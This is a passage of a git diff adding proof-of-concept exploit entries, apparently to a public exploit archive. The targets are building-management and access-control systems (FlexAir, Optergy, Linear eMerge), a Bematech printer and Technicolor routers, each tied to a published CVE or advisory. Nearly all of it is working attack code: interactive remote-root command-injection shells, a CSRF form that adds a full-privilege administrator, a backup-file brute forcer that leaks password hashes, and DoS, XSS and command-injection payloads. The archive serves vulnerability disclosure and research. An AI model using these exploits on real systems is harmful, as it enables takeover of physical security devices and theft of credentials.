+print "Or you can continue using this 'shell'."
+print "Type 'exit' for exit.\n"
+
+while True:
+	try:
+		cmd = raw_input("root@" + the_host[7:] + ":~# ")
+		if cmd.strip() == "exit":
+			print "Have a nice day!"
+			break
+		paramz = {"cmd" : cmd} # sudo cmd
+		shell = requests.get(url = the_host + "/images/jox.jsp", params = paramz)
+		regex = re.search(r"BR>(.*?)</pre>", shell.text, flags = re.S)
+		print regex.group(1).strip()
+	except Exception:
+		break
+
+sys.exit()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47638.sh b/exploits/hardware/webapps/47638.sh
new file mode 100755
index 000000000..985d3b204
--- /dev/null
+++ b/exploits/hardware/webapps/47638.sh
@@ -0,0 +1,57 @@
+# Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 2.4.9api3
+# Tested on: NA
+# CVE : CVE-2019-9189
+# Advisory: https://applied-risk.com/resources/ar-2019-007
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+# PoC
+
+#!/bin/bash
+#
+# Command injection with root privileges in FlexAir Access Control (Prima Systems)
+# Firmware version: <= 2.3.38
+
+#
+# Discovered by Sipke Mellema
+# Updated: 14.01.2019
+#
+##########################################################################
+#
+# $ ./Nova2.3.38_cmd.sh 192.168.13.37 "id"
+# Executing: id
+# Output:
+# uid=0(root) gid=0(root) groups=0(root),10(wheel)
+# Removing temporary file..
+# Done
+#
+##########################################################################
+# Output file on the server
+OUTPUT_FILE="/www/pages/app/images/logos/output.txt"
+# Command to execute
+CMD="$2"
+# IP address
+IP="$1"
+# Change HTTP to HTTPS if required
+HOST="http://${IP}"
+# Add output file
+CMD_FULL="${CMD}>${OUTPUT_FILE}"
+# Command injection payload. Be careful with single quotes!
+PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;${CMD_FULL}'/></request></requests>"
+
+# Perform exploit
+echo "Executing: ${CMD}"
+curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
+# Get output
+echo "Output:"
+curl -s "${HOST}/app/images/logos/output.txt"
+# Remove temp file
+echo "Removing temporary file.."
+PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;rm /www/pages/app/images/logos/output.txt'/></request></requests>"
+curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
+echo "Done"
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47639.txt b/exploits/hardware/webapps/47639.txt
new file mode 100644
index 000000000..d878948e6
--- /dev/null
+++ b/exploits/hardware/webapps/47639.txt
@@ -0,0 +1,160 @@
+# Title: Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: https://optergy.com/
+# Product web page: https://optergy.com/products/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-008
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7273
+
+# Optergy Proton/Enterprise BMS CSRF Add Admin
+
+<!-- CSRF Add Admin Exploit -->
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://192.168.232.19/controlPanel/ajax/UserManipulation.html?add" method="POST">
+      <input type="hidden" name="user.accountEnabled" value="true" />
+      <input type="hidden" name="user.username" value="testingus" />
+      <input type="hidden" name="user.password" value="testingus" />
+      <input type="hidden" name="confirmPassword" value="testingus" />
+      <input type="hidden" name="user.firstname" value="Tester" />
+      <input type="hidden" name="user.lastname" value="Testovski" />
+      <input type="hidden" name="user.companyName" value="TEST Inc." />
+      <input type="hidden" name="user.address" value="TestStr 17-251" />
+      <input type="hidden" name="user.emailAddress" value="aa@bb.cc" />
+      <input type="hidden" name="user.departmentId" value="" />
+      <input type="hidden" name="user.phoneNumber" value="1112223333" />
+      <input type="hidden" name="user.mobileNumber" value="1233211234" />
+      <input type="hidden" name="securityLevel" value="10" />
+      <input type="hidden" name="user.showBanner" value="true" />
+      <input type="hidden" name="user.showMenu" value="true" />
+      <input type="hidden" name="user.showAlarmTab" value="true" />
+      <input type="hidden" name="user.visibleAlarms" value="0" />
+      <input type="hidden" name="user.showBookmarks" value="true" />
+      <input type="hidden" name="user.showNotificationTab" value="true" />
+      <input type="hidden" name="user.autoDismissFeedback" value="true" />
+      <input type="hidden" name="user.canChangeBookmarks" value="true" />
+      <input type="hidden" name="user.canChangePassword" value="true" />
+      <input type="hidden" name="user.canUpdateProfile" value="true" />
+      <input type="hidden" name="homepage-text" value="" />
+      <input type="hidden" name="user.homePageType" value="" />
+      <input type="hidden" name="user.homePage" value="" />
+      <input type="hidden" name="background" value="" />
+      <input type="hidden" name="user.backgroundImage-text" value="" />
+      <input type="hidden" name="user.backgroundImage" value="" />
+      <input type="hidden" name="user.backgroundTiled" value="" />
+      <input type="hidden" name="user.backgroundColour" value="" />
+      <input type="hidden" name="newMemberships" value="1" />
+      <input type="hidden" name="user.id" value="" />
+      <input type="hidden" name="_sourcePage" value="/WEB-INF/jsp/controlPanel/UserAdministration.jsp" />
+      <input type="hidden" name="__fp" value="user.showBookmarks||user.showNotificationTab||user.emailSystemNotifications||user.addToSiteDirectory||user.showMenu||user.departmentId||user.showAlarmTab||user.smsAlarms||user.showBanner||accountExpires||user.autoDismissFeedback||user.changePasswordOnNextLogin||passwordExpires||user.showUserProfile||user.canUpdateProfile||user.canChangePassword||user.canChangeBookmarks||user.accountEnabled||" />
+      <input type="hidden" name="newPrivileges" value="7" />
+      <input type="hidden" name="newPrivileges" value="9" />
+      <input type="hidden" name="newPrivileges" value="8" />
+      <input type="hidden" name="newPrivileges" value="10" />
+      <input type="hidden" name="newPrivileges" value="13" />
+      <input type="hidden" name="newPrivileges" value="14" />
+      <input type="hidden" name="newPrivileges" value="12" />
+      <input type="hidden" name="newPrivileges" value="2" />
+      <input type="hidden" name="newPrivileges" value="3" />
+      <input type="hidden" name="newPrivileges" value="4" />
+      <input type="hidden" name="newPrivileges" value="139" />
+      <input type="hidden" name="newPrivileges" value="138" />
+      <input type="hidden" name="newPrivileges" value="141" />
+      <input type="hidden" name="newPrivileges" value="140" />
+      <input type="hidden" name="newPrivileges" value="124" />
+      <input type="hidden" name="newPrivileges" value="128" />
+      <input type="hidden" name="newPrivileges" value="119" />
+      <input type="hidden" name="newPrivileges" value="19" />
+      <input type="hidden" name="newPrivileges" value="17" />
+      <input type="hidden" name="newPrivileges" value="18" />
+      <input type="hidden" name="newPrivileges" value="20" />
+      <input type="hidden" name="newPrivileges" value="21" />
+      <input type="hidden" name="newPrivileges" value="24" />
+      <input type="hidden" name="newPrivileges" value="23" />
+      <input type="hidden" name="newPrivileges" value="132" />
+      <input type="hidden" name="newPrivileges" value="131" />
+      <input type="hidden" name="newPrivileges" value="134" />
+      <input type="hidden" name="newPrivileges" value="147" />
+      <input type="hidden" name="newPrivileges" value="25" />
+      <input type="hidden" name="newPrivileges" value="135" />
+      <input type="hidden" name="newPrivileges" value="105" />
+      <input type="hidden" name="newPrivileges" value="59" />
+      <input type="hidden" name="newPrivileges" value="142" />
+      <input type="hidden" name="newPrivileges" value="28" />
+      <input type="hidden" name="newPrivileges" value="27" />
+      <input type="hidden" name="newPrivileges" value="102" />
+      <input type="hidden" name="newPrivileges" value="31" />
+      <input type="hidden" name="newPrivileges" value="125" />
+      <input type="hidden" name="newPrivileges" value="30" />
+      <input type="hidden" name="newPrivileges" value="108" />
+      <input type="hidden" name="newPrivileges" value="129" />
+      <input type="hidden" name="newPrivileges" value="33" />
+      <input type="hidden" name="newPrivileges" value="34" />
+      <input type="hidden" name="newPrivileges" value="36" />
+      <input type="hidden" name="newPrivileges" value="37" />
+      <input type="hidden" name="newPrivileges" value="38" />
+      <input type="hidden" name="newPrivileges" value="46" />
+      <input type="hidden" name="newPrivileges" value="127" />
+      <input type="hidden" name="newPrivileges" value="41" />
+      <input type="hidden" name="newPrivileges" value="42" />
+      <input type="hidden" name="newPrivileges" value="45" />
+      <input type="hidden" name="newPrivileges" value="44" />
+      <input type="hidden" name="newPrivileges" value="49" />
+      <input type="hidden" name="newPrivileges" value="48" />
+      <input type="hidden" name="newPrivileges" value="112" />
+      <input type="hidden" name="newPrivileges" value="113" />
+      <input type="hidden" name="newPrivileges" value="117" />
+      <input type="hidden" name="newPrivileges" value="115" />
+      <input type="hidden" name="newPrivileges" value="116" />
+      <input type="hidden" name="newPrivileges" value="133" />
+      <input type="hidden" name="newPrivileges" value="51" />
+      <input type="hidden" name="newPrivileges" value="54" />
+      <input type="hidden" name="newPrivileges" value="56" />
+      <input type="hidden" name="newPrivileges" value="55" />
+      <input type="hidden" name="newPrivileges" value="66" />
+      <input type="hidden" name="newPrivileges" value="67" />
+      <input type="hidden" name="newPrivileges" value="60" />
+      <input type="hidden" name="newPrivileges" value="61" />
+      <input type="hidden" name="newPrivileges" value="62" />
+      <input type="hidden" name="newPrivileges" value="68" />
+      <input type="hidden" name="newPrivileges" value="69" />
+      <input type="hidden" name="newPrivileges" value="103" />
+      <input type="hidden" name="newPrivileges" value="104" />
+      <input type="hidden" name="newPrivileges" value="64" />
+      <input type="hidden" name="newPrivileges" value="65" />
+      <input type="hidden" name="newPrivileges" value="71" />
+      <input type="hidden" name="newPrivileges" value="121" />
+      <input type="hidden" name="newPrivileges" value="122" />
+      <input type="hidden" name="newPrivileges" value="85" />
+      <input type="hidden" name="newPrivileges" value="86" />
+      <input type="hidden" name="newPrivileges" value="74" />
+      <input type="hidden" name="newPrivileges" value="76" />
+      <input type="hidden" name="newPrivileges" value="144" />
+      <input type="hidden" name="newPrivileges" value="75" />
+      <input type="hidden" name="newPrivileges" value="77" />
+      <input type="hidden" name="newPrivileges" value="78" />
+      <input type="hidden" name="newPrivileges" value="79" />
+      <input type="hidden" name="newPrivileges" value="73" />
+      <input type="hidden" name="newPrivileges" value="143" />
+      <input type="hidden" name="newPrivileges" value="109" />
+      <input type="hidden" name="newPrivileges" value="110" />
+      <input type="hidden" name="newPrivileges" value="88" />
+      <input type="hidden" name="newPrivileges" value="89" />
+      <input type="hidden" name="newPrivileges" value="90" />
+      <input type="hidden" name="newPrivileges" value="118" />
+      <input type="hidden" name="newPrivileges" value="95" />
+      <input type="hidden" name="newPrivileges" value="93" />
+      <input type="hidden" name="newPrivileges" value="96" />
+      <input type="hidden" name="newPrivileges" value="94" />
+      <input type="hidden" name="newPrivileges" value="92" />
+      <input type="hidden" name="newPrivileges" value="98" />
+      <input type="hidden" name="newPrivileges" value="99" />
+      <input type="hidden" name="newPrivileges" value="146" />
+      <input type="hidden" name="newPrivileges" value="100" />
+      <input type="submit" value="Forgery" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47640.txt b/exploits/hardware/webapps/47640.txt
new file mode 100644
index 000000000..e20c255e4
--- /dev/null
+++ b/exploits/hardware/webapps/47640.txt
@@ -0,0 +1,27 @@
+# Title: Optergy 2.3.0a - Username Disclosure
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: https://optergy.com/
+# Product web page: https://optergy.com/products/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-008
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7272
+
+# PoC:
+
+curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
+<option value="80">djuro</option>
+<option value="99">teppi</option>
+<option value="67">view</option>
+<option value="3">alerton</option>
+<option value="59">stef</option>
+<option value="41">humba</option>
+<option value="25">drmio</option>
+<option value="11">de3</option>
+<option value="56">andri</option>
+<option value="6">myko</option>
+<option value="22">dzonka</option>
+<option value="76">kosto</option>
+<option value="8">beebee</option>
+<option value="1">Administrator</option>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47641.py b/exploits/hardware/webapps/47641.py
new file mode 100755
index 000000000..7cd19fe9f
--- /dev/null
+++ b/exploits/hardware/webapps/47641.py
@@ -0,0 +1,83 @@
+# Title: Optergy 2.3.0a - Remote Code Execution
+# Author: LiquidWorm
+# Date: 2019-11-05
+# Vendor: https://optergy.com/
+# Product web page: https://optergy.com/products/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-008
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7276
+
+# PoC:
+
+#!/usr/bin/env python
+#
+# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
+#
+# Affected version <=2.0.3a (Proton and Enterprise)
+#
+##############################################################################
+#
+# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
+# Challenge received: 1547540929287
+# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
+# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
+# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
+# # id
+# uid=0(root) gid=0(root) groups=0(root)
+#
+##############################################################################
+#
+#
+
+import os#######
+import sys######
+import json#####
+import hashlib##
+import requests#
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+    print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
+    sys.exit()
+
+while True:
+
+    challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'
+
+    try:
+        req1 = requests.get(challenge_url)
+        get_challenge = json.loads(req1.text)
+        challenge = get_challenge['response']['message']
+        print 'Challenge received: ' + challenge
+
+        hash_object = hashlib.sha1(challenge.encode())
+        print 'SHA1: '+(hash_object.hexdigest())
+        h1 = (hash_object.hexdigest())
+        hash_object = hashlib.md5(h1.encode())
+        print 'MD5 from SHA1: '+(hash_object.hexdigest())
+        h2 = (hash_object.hexdigest())
+        print 'Answer: '+h1+h2
+        
+        zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
+        zeCommand = raw_input('# ')
+        if zeCommand.strip() == 'exit':
+            sys.exit()
+        zeHeaders = {'User-Agent'      : 'BB/BMS-251.4ev4h',
+                     'Accept'          : '*/*',
+                     'Accept-Encoding' : 'gzip, deflate',
+                     'Accept-Language' : 'mk-MK,mk;q=1.7',
+                     'Connection'      : 'keep-alive',
+                     'Connection-Type' : 'application/x-www-form-urlencoded'}
+        zePardata = {'command'         : 'sudo '+zeCommand,
+                     'challenge'       : challenge,
+                     'answer'          : h1+h2}
+
+        zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
+        get_resp = json.loads(zeRequest.text)
+        get_answ = get_resp['response']['message']
+        print get_answ
+    except Exception:
+        print '[*] Error!'
+        break
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47644.py b/exploits/hardware/webapps/47644.py
new file mode 100755
index 000000000..0fb7f27a2
--- /dev/null
+++ b/exploits/hardware/webapps/47644.py
@@ -0,0 +1,97 @@
+# Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass
+# Google Dork: NA
+# Date: 2019-11-11
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
+# Software Link: https://www.computrols.com/building-automation-software/
+# Version: 2.3.35
+# Tested on: NA
+# CVE : CVE-2019-7666, CVE-2019-7667
+# Advisory: https://applied-risk.com/resources/ar-2019-007
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+
+#!/usr/bin/env python
+# -*- coding: utf8 -*-
+#
+# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
+# Authentication Bypass (Login with MD5 hash)
+#
+# Older versions: /links/Nova_Config_2019-01-03.bck
+# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
+# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
+# Fixed versions: 2.4
+#
+###################################################################################
+#
+# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
+# [+] Please wait while fetchin the backup config file...
+# [+] Found some juice!
+# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
+# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
+# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db 
+# SQLite version 3.22.0 2018-01-22 18:45:57
+# Enter ".help" for usage hints.
+# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
+# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
+# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
+# sqlite> .q
+# lqwrm@metalgear:~/stuff/prima$ 
+#
+###################################################################################
+#
+# 11.01.2019
+#
+
+import os#######
+import sys######
+import time#####
+import requests#
+
+from datetime import timedelta, date
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+    print '[+] Usage: '+piton+' [target]'
+    print '[+] Target example 1: http://10.0.0.17:8080'
+    print '[+] Target example 2: https://primanova.tld\n'
+    sys.exit()
+
+host = sys.argv[1]
+
+def datum(start_date, end_date):
+    for n in range(int ((end_date - start_date).days)):
+        yield start_date + timedelta(n)
+
+start_date = date(2017, 1, 1)
+end_date = date(2019, 12, 30)
+
+print '[+] Please wait while fetchin the backup config file...'
+
+def spinning_cursor():
+    while True:
+        for cursor in '|/-\\':
+            yield cursor
+
+spinner = spinning_cursor()
+
+for mooshoo in datum(start_date, end_date):
+    sys.stdout.write(next(spinner))
+    sys.stdout.flush()
+    time.sleep(0.1)
+    sys.stdout.write('\b')
+    h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)
+    
+    if (h.status_code) == 200:
+        print '[+] Found some juice!'
+        print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
+        timestr = time.strftime('%H%M%S')
+        time.sleep(1)
+        open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
+        print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
+        sys.exit()
+
+print '[-] No backup for you today. :('
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47648.txt b/exploits/hardware/webapps/47648.txt
new file mode 100644
index 000000000..b23b94ced
--- /dev/null
+++ b/exploits/hardware/webapps/47648.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Bematech Printer MP-4200 - Denial of Service 
+# Date: 2019-11-11
+# Exploit Author: Jonatas Fil
+# Vendor Homepage: https://www.bematech.com.br/
+# Software Link: https://www.bematech.com.br/produto/mp-4200-th/
+# Version: MP-4200 TH
+# Tested on: Windows and Linux
+# CVE : N/A
+
+DoS Poc:
+--------------------------------------------------------------------------------------------------------
+POST /en/conf_admin.html HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/73.0.3683.75 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,pt;q=0.8
+Cache-Control: max-age=0
+Referer: http://TARGET/en/conf_admin.html
+Content-Length: 40
+Content-Type: application/x-www-form-urlencoded
+
+admin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&person=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&SUBMIT_ADMIN=Submit
+
+--------------------------------------------------------------------------------------------------------
+XSS Poc:
+--------------------------------------------------------------------------------------------------------
+POST /en/conf_admin.html HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,
+like Gecko) Chrome/73.0.3683.75 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9,pt;q=0.8
+Cache-Control: max-age=0
+Referer: http://printer.com/en/conf_admin.html
+Content-Length: 40
+Content-Type: application/x-www-form-urlencoded
+
+admin=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&person=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT_ADMIN=Submit
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47649.py b/exploits/hardware/webapps/47649.py
new file mode 100755
index 000000000..05676fdd0
--- /dev/null
+++ b/exploits/hardware/webapps/47649.py
@@ -0,0 +1,116 @@
+# Title: Linear eMerge E3 1.00-06 - Remote Code Execution
+# Author: LiquidWorm
+# Date: 2019-11-13
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Affected version: <=2.3.0a
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+# CVE: CVE-2019-7256
+
+#!/usr/bin/env python
+#
+# Linear eMerge E3 Unauthenticated Command Injection Remote Root Exploit
+# Affected version: <=1.00-06
+# via card_scan_decoder.php
+# CVE: CVE-2019-7256
+# Advisory: https://applied-risk.com/resources/ar-2019-005
+# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
+#
+# By Gjoko 'LiquidWorm' Krstic
+#
+#########################################################################
+# lqwrm@metalgear:~/stuff$ python emergeroot2.py 192.168.1.2
+# Do you want me to try and get the web front-end credentials? (y/n) y
+# ID='admin',Password='MakeLoveNotWar!'
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ id
+# uid=1003(lighttpd) gid=0(root)
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ cat /etc/version
+# Software Version: 1.00.03
+# Image: nxgcpub-image
+# Built by: jenkins
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ echo davestyle |su -c id
+# Password: 
+# uid=0(root) gid=0(root) groups=0(root)
+#
+# lighttpd@192.168.1.2:/spider/web/webroot$ exit
+#
+# [+] Erasing read stage file and exiting...
+# [+] Done. Ba-bye!
+#
+#########################################################################
+
+import requests
+import time####
+import sys#####
+import os######
+import re######
+
+piton = os.path.basename(sys.argv[0])
+
+if len(sys.argv) < 2:
+	print '''
+                                         .....                              
+                                    .e$$$$$$$$$$$$$$e.                      
+                                  z$$ ^$$$$$$$$$$$$$$$$$.                   
+                                .$$$* J$$$$$$$$$$$$$$$$$$$e                 
+                               .$"  .$$$$$$$$$$$$$$$$$$$$$$*-               
+                              .$  $$$$$$$$$$$$$$$$***$$  .ee"               
+                 z**$$        $$r ^**$$$$$$$$$*" .e$$$$$$*"                 
+                " -\e$$      4$$$$.         .ze$$$""""                      
+               4 z$$$$$      $$$$$$$$$$$$$$$$$$$$"                          
+               $$$$$$$$     .$$$$$$$$$$$**$$$$*"                            
+             z$$"    $$     $$$$P*""     J$*$$c                             
+            $$"      $$F   .$$$          $$ ^$$                             
+           $$        *$$c.z$$$          $$   $$                             
+          $P          $$$$$$$          4$F   4$                             
+         dP            *$$$"           $$    '$r                            
+        .$                            J$"     $"                            
+        $                             $P     4$                             
+        F                            $$      4$                             
+                                    4$%      4$                             
+                                    $$       4$                             
+                                   d$"       $$                             
+                                   $P        $$                             
+                                  $$         $$                             
+                                 4$%         $$                             
+                                 $$          $$                             
+                                d$           $$                             
+                                $F           "3                             
+                         r=4e="  ...  ..rf   .  ""%                         
+                        $**$*"^""=..^4*=4=^""  ^"""
+  '''
+	print '\n\x20\x20[+] Linear eMerge E3 Remote Root Exploit'
+	print '\x20\x20[-] by lqwrm (c) 2019'
+	print '\n\x20\x20[*] Usage: '+piton+' <ipaddress:port>\n'
+	sys.exit()
+
+ipaddr = sys.argv[1]
+
+creds = raw_input('Do you want me to try and get the web front-end credentials? (y/n) ')
+if creds.strip() == 'y':
+    frontend = '''grep "Controller" /tmp/SpiderDB/Spider.db |cut -f 5,6 -d ',' |grep ID'''
+    requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+frontend+' > test.txt%60')
+    showme = requests.get('http://'+ipaddr+'/test.txt')
+    print showme.text
+
+while True:
+	try:
+		cmd = raw_input('lighttpd@'+ipaddr+':/spider/web/webroot$ ')
+		execute = requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&door=%60'+cmd+' > test.txt%60')
+		#time.sleep(1);
+		readreq = requests.get('http://'+ipaddr+'/test.txt')
+		print readreq.text
+		if cmd.strip() == 'exit':
+			print "[+] Erasing read stage file and exiting..."
+			requests.get('http://'+ipaddr+'/card_scan_decoder.php?No=30&ReaderNo=%60rm test.txt%60')
+			print "[+] Done. Ba-bye!\n"
+			break
+		else: continue
+	except Exception:
+		break
+
+sys.exit()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47651.txt b/exploits/hardware/webapps/47651.txt
new file mode 100644
index 000000000..c209a9342
--- /dev/null
+++ b/exploits/hardware/webapps/47651.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Technicolor TD5130.2 - Remote Command Execution
+# Date: 2019-11-12
+# Exploit Author: João Teles
+# Vendor Homepage: https://www.technicolor.com/
+# Version: TD5130v2
+# Firmware Version: OI_Fw_V20
+# CVE : CVE-2019-18396
+
+---------------------------
+
+POST /mnt_ping.cgi HTTP/1.1
+Host: HOST
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http:/HOST/mnt_ping.cgi
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 53
+Cookie: session=COOKIE
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+isSubmit=1&addrType=3&pingAddr=;ls&send=Send
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47652.py b/exploits/hardware/webapps/47652.py
new file mode 100755
index 000000000..92593a82c
--- /dev/null
+++ b/exploits/hardware/webapps/47652.py
@@ -0,0 +1,89 @@
+# Exploit Title: Technicolor TC7300.B0 - 'hostname' Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2019-11-11
+# Exploit Author: Luis Stefan
+# Vendor Homepage: https://www.technicolor.com/
+# Software Link: N/A
+# Version: TC7300.B0 - STFA.51.20
+# Tested on: macOS Mojave and Catalina
+# CVE : 
+
+#!/usr/bin/env python3
+__author__ = "Luis Stefan"
+__license__ = "MIT"
+__version__ = "1.0"
+__email__ = "luis.ss@protonmail.com"
+__description__ = """CVE-2019-17524.py: This script is used to exploit a xss vulnerability found in a technicolor device."""
+
+from enum import IntEnum
+from scapy.all import *
+import codecs, threading, time
+
+# Define your network interface
+interface = 'en0'
+# Insert your interface card mac address
+mac = 'xx:xx:xx:xx:xx:xx'
+broadcast = 'ff:ff:ff:ff:ff:ff'
+mac_hxd = codecs.decode(mac.replace(':', ''),'hex')
+
+class Bootp(IntEnum):
+    Discover = 1
+    Offer = 2
+    Request = 3
+    Decline = 4
+    Ack = 5
+    Nak = 6
+    Release = 7
+
+def dhcp_discover():
+    disc_pkt = Ether(src=mac, dst=broadcast) / \
+        IP(src='0.0.0.0', dst='255.255.255.255') / \
+        UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
+        DHCP(options=[('message-type', 'discover'), 'end'])
+    sendp(disc_pkt, iface=interface)
+
+def dhcp_request(pkt):
+    yraddr = pkt['BOOTP'].yraddr
+    # gwaddr == Gateway Ip Address
+    gwaddr = '192.168.0.1'
+    param_req_list = []
+    hostname = "<script>alert('XSS triggered')</script>"
+    req_pkt = Ether(src=mac, dst=broadcast) / \
+        IP(src='0.0.0.0', dst='255.255.255.255') / \
+        UDP(dport=67, sport=68) / BOOTP(chaddr=mac_hxd) / \
+        DHCP(options=[('message-type', 'request'), ('server_id', gwaddr),
+                      ('requested_addr', yraddr), ('hostname', hostname), 'end'])
+    sendp(req_pkt, iface=interface)
+
+def dhcp(pkt):
+    print(pkt.display())
+    print("#############################################################")
+    if pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Offer:
+        dhcp_request(pkt)
+    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Ack:
+        print("Server Acknowledged")
+        sys.exit(0)
+    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Decline:
+        print("Server Declined")
+        sys.exit(0)
+    elif pkt.haslayer(DHCP) and pkt['DHCP'].options[0][1] == Bootp.Nak:
+        print("Server Nak")
+        sys.exit(0)
+
+
+def ver_dhcp():
+    print("Verifying DHCP port traffic..")
+    sniff(iface=interface, prn=dhcp, filter="port 68 and port 67", timeout=20)
+    sys.exit(0)
+
+
+def main():
+    t1 = threading.Thread(target=ver_dhcp, args=())
+    t1.setDaemon = True
+    t1.start()
+    time.sleep(2)
+    dhcp_discover()
+
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47654.py b/exploits/hardware/webapps/47654.py
new file mode 100755
index 000000000..f454f6a89
--- /dev/null
+++ b/exploits/hardware/webapps/47654.py
@@ -0,0 +1,84 @@
+# Exploit Title: Fastweb Fastgate 0.00.81 - Remote Code Execution
+# Date: 2019-11-13
+# Exploit Author: Riccardo Gasparini
